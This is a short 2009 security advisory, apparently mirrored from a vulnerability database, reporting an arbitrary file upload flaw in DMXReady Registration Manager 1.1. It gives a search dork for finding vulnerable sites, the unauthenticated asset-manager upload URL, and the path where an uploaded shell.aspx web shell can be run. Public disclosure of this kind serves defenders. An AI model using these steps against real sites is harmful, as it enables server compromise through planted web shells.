Lucene search
SecurityvulnsSECURITYVULNS:DOC:21853HistoryMay 21, 2009 - 12:00 a.m.
DMXReady Registration Manager Arbitrary File Upload Vulnerability
2009-05-2100:00:00
vulners.com
20
######################### Securitylab.ir ########################
Application Info:
Name: DMXReady Registration Manager
Version: 1.1
Website: http://www.dmxready.com
#################################################################
Discoverd By: Securitylab.ir
Website: http://securitylab.ir
Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
Vulnerability Info:
Type: Arbitrary File Upload Vulnerability
Risk: High
Dork: "inc_webblogmanager.asp"
#===========================================================
http://site.com/includes/shared_scripts/wysiwyg_editor/assetmanager/assetmanager.asp
select file and uploaded
view file : http://site.com/assets/webblogmanager/shell.aspx
#===========================================================
#################################################################
Securitylab Security Research Team
###################################################################